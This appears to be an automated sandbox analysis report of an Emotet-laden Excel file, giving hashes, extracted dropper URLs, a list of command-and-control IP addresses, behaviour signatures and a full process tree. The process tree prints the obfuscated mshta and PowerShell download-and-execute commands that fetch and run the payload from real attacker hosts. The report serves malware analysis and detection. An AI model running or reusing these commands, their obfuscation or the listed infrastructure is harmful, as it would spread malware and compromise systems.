Analysis

  • max time kernel
    119s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    21-01-2022 10:27

General

  • Target

    6407591df6ce61f946e24715faa6fba1b1f3221e2baf22f6c4f5a64f1ea98eb5.xls

  • Size

    71KB

  • MD5

    21fc12ef8a4a4ba5b38a303fa7e70c08

  • SHA1

    5700a2231371b289eae19ce62e1a73457ee582c4

  • SHA256

    6407591df6ce61f946e24715faa6fba1b1f3221e2baf22f6c4f5a64f1ea98eb5

  • SHA512

    8200f14c0a8023bb74b39796f7859258ef67a21a5f81704f82315695409795fe724ac8ca81513a95d50d169c824532e43865846ce42b0e541366309ace849654

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0xb907d607/fer/fe2.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://185.7.214.7/fer/fe2.png

Extracted

Family

emotet

Botnet

Epoch4

C2

131.100.24.231:80

209.59.138.75:7080

103.8.26.103:8080

51.38.71.0:443

212.237.17.99:8080

79.172.212.216:8080

207.38.84.195:8080

104.168.155.129:8080

178.79.147.66:8080

46.55.222.11:443

103.8.26.102:8080

192.254.71.210:443

45.176.232.124:443

203.114.109.124:443

51.68.175.8:8080

58.227.42.236:80

45.142.114.231:8080

217.182.143.207:443

178.63.25.185:443

45.118.115.99:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

    suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\6407591df6ce61f946e24715faa6fba1b1f3221e2baf22f6c4f5a64f1ea98eb5.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1660
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe2.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1376
      • C:\Windows\SysWOW64\mshta.exe
        mshta http://0xb907d607/fer/fe2.html
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1368
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fe2.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1912
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1716
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1536
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:1680
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ehdhfiubwj\ijclomfdniiic.hnz",FKqQHd
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1664
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ehdhfiubwj\ijclomfdniiic.hnz",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    PID:596

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Public\Documents\ssd.dll

    MD5

    e78907a28142982effcdcca8a7a98d7a

    SHA1

    80a8a3656fb03534098ad408f06c85973a31c980

    SHA256

    998f9853032ee7da19ee5a8856bf308bcc8965ae3f9cf05fbb1ed7e79543ddd5

    SHA512

    a6b020f4d6d382cdabcd1a6e24c14952772edb2584dd72da1390dbf9d30413c5f80341b65de8c09072a6689438d67a7fcd6371e532407b5f8fec5d30889b3be9

  • \Users\Public\Documents\ssd.dll

    MD5

    e78907a28142982effcdcca8a7a98d7a

    SHA1

    80a8a3656fb03534098ad408f06c85973a31c980

    SHA256

    998f9853032ee7da19ee5a8856bf308bcc8965ae3f9cf05fbb1ed7e79543ddd5

    SHA512

    a6b020f4d6d382cdabcd1a6e24c14952772edb2584dd72da1390dbf9d30413c5f80341b65de8c09072a6689438d67a7fcd6371e532407b5f8fec5d30889b3be9

  • \Users\Public\Documents\ssd.dll

    MD5

    e78907a28142982effcdcca8a7a98d7a

    SHA1

    80a8a3656fb03534098ad408f06c85973a31c980

    SHA256

    998f9853032ee7da19ee5a8856bf308bcc8965ae3f9cf05fbb1ed7e79543ddd5

    SHA512

    a6b020f4d6d382cdabcd1a6e24c14952772edb2584dd72da1390dbf9d30413c5f80341b65de8c09072a6689438d67a7fcd6371e532407b5f8fec5d30889b3be9

  • \Users\Public\Documents\ssd.dll

    MD5

    e78907a28142982effcdcca8a7a98d7a

    SHA1

    80a8a3656fb03534098ad408f06c85973a31c980

    SHA256

    998f9853032ee7da19ee5a8856bf308bcc8965ae3f9cf05fbb1ed7e79543ddd5

    SHA512

    a6b020f4d6d382cdabcd1a6e24c14952772edb2584dd72da1390dbf9d30413c5f80341b65de8c09072a6689438d67a7fcd6371e532407b5f8fec5d30889b3be9

  • \Users\Public\Documents\ssd.dll

    MD5

    e78907a28142982effcdcca8a7a98d7a

    SHA1

    80a8a3656fb03534098ad408f06c85973a31c980

    SHA256

    998f9853032ee7da19ee5a8856bf308bcc8965ae3f9cf05fbb1ed7e79543ddd5

    SHA512

    a6b020f4d6d382cdabcd1a6e24c14952772edb2584dd72da1390dbf9d30413c5f80341b65de8c09072a6689438d67a7fcd6371e532407b5f8fec5d30889b3be9

  • \Users\Public\Documents\ssd.dll

    MD5

    e78907a28142982effcdcca8a7a98d7a

    SHA1

    80a8a3656fb03534098ad408f06c85973a31c980

    SHA256

    998f9853032ee7da19ee5a8856bf308bcc8965ae3f9cf05fbb1ed7e79543ddd5

    SHA512

    a6b020f4d6d382cdabcd1a6e24c14952772edb2584dd72da1390dbf9d30413c5f80341b65de8c09072a6689438d67a7fcd6371e532407b5f8fec5d30889b3be9

  • \Users\Public\Documents\ssd.dll

    MD5

    e78907a28142982effcdcca8a7a98d7a

    SHA1

    80a8a3656fb03534098ad408f06c85973a31c980

    SHA256

    998f9853032ee7da19ee5a8856bf308bcc8965ae3f9cf05fbb1ed7e79543ddd5

    SHA512

    a6b020f4d6d382cdabcd1a6e24c14952772edb2584dd72da1390dbf9d30413c5f80341b65de8c09072a6689438d67a7fcd6371e532407b5f8fec5d30889b3be9

  • \Users\Public\Documents\ssd.dll

    MD5

    e78907a28142982effcdcca8a7a98d7a

    SHA1

    80a8a3656fb03534098ad408f06c85973a31c980

    SHA256

    998f9853032ee7da19ee5a8856bf308bcc8965ae3f9cf05fbb1ed7e79543ddd5

    SHA512

    a6b020f4d6d382cdabcd1a6e24c14952772edb2584dd72da1390dbf9d30413c5f80341b65de8c09072a6689438d67a7fcd6371e532407b5f8fec5d30889b3be9

  • \Users\Public\Documents\ssd.dll

    MD5

    e78907a28142982effcdcca8a7a98d7a

    SHA1

    80a8a3656fb03534098ad408f06c85973a31c980

    SHA256

    998f9853032ee7da19ee5a8856bf308bcc8965ae3f9cf05fbb1ed7e79543ddd5

    SHA512

    a6b020f4d6d382cdabcd1a6e24c14952772edb2584dd72da1390dbf9d30413c5f80341b65de8c09072a6689438d67a7fcd6371e532407b5f8fec5d30889b3be9

  • memory/596-95-0x0000000000990000-0x00000000009B6000-memory.dmp

    Filesize

    152KB

  • memory/596-101-0x0000000002620000-0x0000000002646000-memory.dmp

    Filesize

    152KB

  • memory/596-97-0x0000000002490000-0x00000000024B6000-memory.dmp

    Filesize

    152KB

  • memory/596-99-0x0000000002530000-0x0000000002556000-memory.dmp

    Filesize

    152KB

  • memory/596-103-0x00000000026C0000-0x00000000026E6000-memory.dmp

    Filesize

    152KB

  • memory/596-105-0x0000000002880000-0x00000000028A6000-memory.dmp

    Filesize

    152KB

  • memory/596-107-0x00000000029C0000-0x00000000029E6000-memory.dmp

    Filesize

    152KB

  • memory/596-111-0x0000000002AD0000-0x0000000002AF6000-memory.dmp

    Filesize

    152KB

  • memory/596-109-0x0000000002A21000-0x0000000002A43000-memory.dmp

    Filesize

    136KB

  • memory/596-110-0x0000000002A20000-0x0000000002A46000-memory.dmp

    Filesize

    152KB

  • memory/1536-68-0x00000000001B0000-0x00000000001D6000-memory.dmp

    Filesize

    152KB

  • memory/1660-55-0x0000000071551000-0x0000000071553000-memory.dmp

    Filesize

    8KB

  • memory/1660-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/1660-57-0x0000000075F81000-0x0000000075F83000-memory.dmp

    Filesize

    8KB

  • memory/1660-113-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/1660-54-0x000000002F561000-0x000000002F564000-memory.dmp

    Filesize

    12KB

  • memory/1664-90-0x00000000001F0000-0x0000000000216000-memory.dmp

    Filesize

    152KB

  • memory/1680-75-0x00000000001E0000-0x0000000000206000-memory.dmp

    Filesize

    152KB

  • memory/1680-88-0x0000000002940000-0x0000000002966000-memory.dmp

    Filesize

    152KB

  • memory/1680-85-0x0000000002790000-0x00000000027B6000-memory.dmp

    Filesize

    152KB

  • memory/1680-83-0x0000000000D20000-0x0000000000D46000-memory.dmp

    Filesize

    152KB

  • memory/1680-81-0x0000000000B60000-0x0000000000B86000-memory.dmp

    Filesize

    152KB

  • memory/1680-79-0x0000000000970000-0x0000000000996000-memory.dmp

    Filesize

    152KB

  • memory/1680-77-0x0000000000900000-0x0000000000926000-memory.dmp

    Filesize

    152KB

  • memory/1912-61-0x0000000002350000-0x0000000002F9A000-memory.dmp

    Filesize

    12.3MB

  • memory/1912-60-0x0000000002350000-0x0000000002F9A000-memory.dmp

    Filesize

    12.3MB